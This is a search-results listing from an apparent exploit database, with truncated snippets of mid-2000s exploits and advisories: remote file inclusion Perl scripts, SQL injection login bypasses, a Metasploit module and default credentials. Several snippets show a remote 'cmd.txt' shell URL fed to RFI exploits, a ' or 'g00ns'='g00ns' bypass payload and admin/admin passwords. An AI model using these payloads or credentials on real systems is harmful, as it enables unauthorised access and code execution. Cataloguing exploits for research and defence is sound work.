1140 matches found
INDEXU 5.0.1 - base_path Remote File Inclusion
INDEXU 5.0.1 - basepath Remote File Inclusion !/usr/bin/perl INDEXU perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd;...
AngelineCMS 0.8.1 - installpath Remote File Inclusion
AngelineCMS 0.8.1 - installpath Remote File Inclusion !/usr/bin/perl AngelineCMS 0.8.1 installpath Remote Code Execution Exploit Bug Found & code By K-159 code reference from uid0/zod at ExploiterCode.com echo.or.id c 2006 usage: perl angelineCMS.pl perl angelineCMS.pl http://target.com/...
INDEXU <= 5.0.1 (base_path) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ========================================================= INDEXU perl indexu.pl http://target.com/indexu/ http://target.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd;...
VWar-1.5.0.pl.txt
!/usr/bin/perl VWar perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! special shout to illwill! Contact: www.exploitercode.com...
VWar 1.5.0 R12 Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ============================================ VWar 1.5.0 R12 Remote File Inclusion Exploit ============================================ !/usr/bin/perl VWar perl vwar.pl http://site.com/VWar/ http://site.com/cmd.txt cmd cmd shell example: cm...
PHPNuke-Clan 3.0.1 (vwar_root2) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ============================================================= PHPNuke-Clan 3.0.1 vwarroot2 Remote File Inclusion Exploit ============================================================= !/usr/bin/perl PHPNuke-Clan 3.0.1 Remote File Inclusion...
SQuery 4.5 - libpath Remote File Inclusion
SQuery 4.5 - libpath Remote File Inclusion !/usr/bin/perl SQuery perl squery.pl http://site.com/SQuery/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster, spic, cijfer ;P, ReZeN, wr0ck, blackhat-alliance.org, and everyone else! special shout to...
KnowledgebasePublisher 1.2 (include) Remote Code Execution Exploit
No description provided by source. !/usr/bin/perl KnowledgebasePublisher 1.2 Remote Code Execution Exploit Bug Found By uid0 c 2006 ExploiterCode.com usage: perl knowledgebase.pl location of KnowledgebasePublisher cmd shell location cmd shell variable perl knowledgebase.pl...
KnowledgebasePublisher 1.2 - 'Include' Remote Code Execution
!/usr/bin/perl KnowledgebasePublisher 1.2 Remote Code Execution Exploit Bug Found By uid0 c 2006 ExploiterCode.com usage: perl knowledgebase.pl perl knowledgebase.pl http://site.com/knowledgebase/ http://site.com/cmd.txt cmd cmd shell example: cmd shell variable: $GETcmd; hai to: nex, kutmaster,...
ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit
No description provided by source. !/usr/bin/perl SQL Injection Exploit for ASPThai.Net Guestbook = 5.5 And possible higher could not find a site to test it on This exploit shows the username of the administrator and the password In plain text Bug Found by muderskillz Coded by Zodiac Shouts to...
ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit
Exploit for unknown platform in category web applications ================================================================ ASPThai.Net Guestbook new or die; $cookiejar = HTTP::Cookies-new; $xpl-agent'g00ns'; $xpl-cookiejar$cookiejar; $res = $xpl-post $Server.'checkuser.asp', Content = 'txtUserNam...
ASPThai.Net Guestbook 5.5 - Authentication Bypass
!/usr/bin/perl SQL Injection Exploit for ASPThai.Net Guestbook new or die; $cookiejar = HTTP::Cookies-new; $xpl-agent'g00ns'; $xpl-cookiejar$cookiejar; $res = $xpl-post $Server.'checkuser.asp', Content = 'txtUserName' = '' or '%67%30%30%6e%73'='%67%30%30%6e%73', 'txtUserPass' = '' or...
dbmanDefault.txt
Tunis the 31/jan/2006 bug found by Fireboy [email protected] Product affected:DBMan for Windows and Unix Product vendor: http://www.gossamer-threads.com the problem with DBman is default passwords these are default pass : admin/admin,author/author,guest/guest if the admin not change the pas...
[KAPDA::#18] - WebWiz Products SQL Injection
KAPDA::18 - WebWiz Products SQL Injection Happy new year ! : KAPDA New advisory Vulnerable products : webwiz site news access2000 : vesion 3.06 and prior versions webwiz journal access2000 : version 1.0 webwiz weekly poll access2000 : version 3.06 and prior versions database login access2000 :...
Battle Carry <= .005 Socket Termination Denial of Service Exploit
Exploit for unknown platform in category dos / poc ================================================================= Battle Carry include include include ifdef WIN32 include / Header file used for manage errors in Windows It support socket and errno too this header replace the previous sockerrX.h...
Microsoft IIS - SA WebAgent 5.25.3 Redirect Overflow (Metasploit)
Microsoft IIS - SA WebAgent 5.25.3 Redirect Overflow Metasploit This file is part of the Metasploit Framework and may be redistributed according to the licenses defined in the Authors field below. In the case of an unknown or missing license, this file defaults to the same license as the core...
Microsoft Windows XP/2000/2003 - Keyboard Event Privilege Escalation
// source: https://www.securityfocus.com/bid/14743/info Microsoft Windows is prone to a privilege escalation weakness. This issue is due to a design error when desktop applications handle keyboard events sent through the keybdevent function. The specific issue is that programs may send keyboard...
Forum Russian Board 4.2 Full Command Execution Exploit
No description provided by source. !/usr/bin/perl Forum Russian Board 4.2 Full FRB http://www.carline.ru , http://frb.ru command execution exploit by RST/GHC http://rst.void.ru , http://ghc.ru bugs found by foster & 1dt.w0lf , xpl coded by 1dt.w0lf RST/GHC - http://rst.void.ru , http://ghc.ru use...
CVE-2003-1151
Cross-site scripting XSS vulnerability in Fastream NETFile Server 6.0.3.588 allows remote attackers to inject arbitrary web script or HTML via the URL, which is displayed on a "404 Not Found" error page...
CVE-2005-0093
Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none...